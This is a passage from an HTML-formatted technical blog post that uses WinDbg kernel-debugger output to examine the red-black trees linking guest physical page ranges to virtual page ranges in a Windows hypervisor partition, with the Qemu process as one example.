<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> dt _RTL_RB_TREE ffffd883`444197b0 – GPN tree</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> nt!_RTL_RB_TREE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Root : 0xffffd883`443b2890 _RTL_BALANCED_NODE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 Encoded : 0y0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 Min : 0xffffd883`48d75890 _RTL_BALANCED_NODE </span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We will work with the GPN tree. The top of the tree looks something like this (the Red field shows which node is black and which is red):</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> dx -id 0,0,ffffd8833e087040 -r1 ((ntkrnlmp!_RTL_BALANCED_NODE *)0xffffd883443b2890)</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">((ntkrnlmp!_RTL_BALANCED_NODE *)0xffffd883443b2890) : 0xffffd883443b2890 [Type: _RTL_BALANCED_NODE *]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x000] Children [Type: _RTL_BALANCED_NODE * [2]]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x000] Left : 0xffffd883443a8e10 [Type: _RTL_BALANCED_NODE *]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x008] Right : 0xffffd88342f4a690 [Type: _RTL_BALANCED_NODE *]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x010 ( 0: 0)] Red : 0x0 [Type: unsigned char]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x010 ( 1: 0)] Balance : 0x0 [Type: unsigned char]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x010] ParentValue : 0x0 [Type: unsigned __int64]</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> dx -id 0,0,ffffd8833e087040 -r1 ((ntkrnlmp!_RTL_BALANCED_NODE *)0xffffd883443a8e10)</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">((ntkrnlmp!_RTL_BALANCED_NODE *)0xffffd883443a8e10) : 0xffffd883443a8e10 [Type: _RTL_BALANCED_NODE *]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x000] Children [Type: _RTL_BALANCED_NODE * [2]]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x000] Left : 0xffffd88344398490 [Type: _RTL_BALANCED_NODE *]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x008] Right : 0xffffd883443ae090 [Type: _RTL_BALANCED_NODE *]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x010 ( 0: 0)] Red : 0x1 [Type: unsigned char]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x010 ( 1: 0)] Balance : 0x1 [Type: unsigned char]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x010] ParentValue : 0xffffd883443b2891 [Type: unsigned __int64]</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> dx -id 0,0,ffffd8833e087040 -r1 ((ntkrnlmp!_RTL_BALANCED_NODE *)0xffffd88344398490)</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">((ntkrnlmp!_RTL_BALANCED_NODE *)0xffffd88344398490) : 0xffffd88344398490 [Type: _RTL_BALANCED_NODE *]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x000] Children [Type: _RTL_BALANCED_NODE * [2]]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x000] Left : 0xffffd88348d75890 [Type: _RTL_BALANCED_NODE *]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x008] Right : 0xffffd88344398510 [Type: _RTL_BALANCED_NODE *]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x010 ( 0: 0)] Red : 0x0 [Type: unsigned char]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x010 ( 1: 0)] Balance : 0x0 [Type: unsigned char]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x010] ParentValue : 0xffffd883443a8e10 [Type: unsigned __int64]</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We are primarily interested in the payload contained in the body of a tree leaf.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> dps 0xffffd88346564610</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564610 00000000`00000000</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564618 00000000`00000000</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564620 ffffd883`46564910</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564628 ffffd883`4802e558</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564630 ffffd883`4802e558</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564638 fffffc0f`022a73a0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564640 fffffc0f`022a73a0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564648 00000000`0000000e – Start GPA</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564650 00000000`0000009f – End GPA</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564658 ffffd883`44414000 – Prtn object</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564660 ffffd883`4802e530 – corresponding element of the VPN tree</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564668 00000000`00000040</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564670 00000000`00000003</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564678 00000000`00000000</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> dps 0xffffd8834802e530</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`4802e530 ffffd883`4802caa0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`4802e538 ffffd883`4802f250</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`4802e540 ffffd883`4802f7a0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`4802e548 00000000`281af2ee – Start virtual page address</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`4802e550 00000000`281af37f – End virtual page address</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`4802e558 ffffd883`46564628</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`4802e560 ffffd883`46564628</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`4802e568 00000000`00000001</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="99" src="https://lh6.googleusercontent.com/rjobTPXcvPBYU4qp4Aj1KCGBHWjegfZ_lbvoUfdT2sMxqRcmyPnyxy8Gynubw6y2EX_RykgI3mS0o3maymkHpaQkOEwarRSg0ERYgfOBzvANH8gfcByqwB5wVIiMPrtV4yYD4GGAc1gChjIjFw" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For the Qemu process, you can see that the base address of the memory region coincides with the beginning of the VPN block:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> dps 0xffffad04c7872c10</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c10 00000000`00000000</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c18 ffffad04`cc1b7610</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c20 ffffad04`cc269610</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c28 ffffad04`c96a75b8</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c30 ffffad04`c96a75b8</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c38 ffffbf8d`0ef103a0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c40 ffffbf8d`0ef103a0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c48 00000000`00000000 – Start GPA</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c50 00000000`0000009f – End GPA</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c58 ffffad04`c8bd1000 </span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c60 ffffad04`c96a7590 – corresponding VPN tree element</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c68 00000000`00000040</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c70 00000000`00000003</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c78 00000000`00000000</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> dps ffffad04`c96a7590</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c96a7590 ffffad04`ccb86120</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c96a7598 ffffad04`c6cd8af0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c96a75a0 ffffad04`c6cd94a0</span></div>
</div>
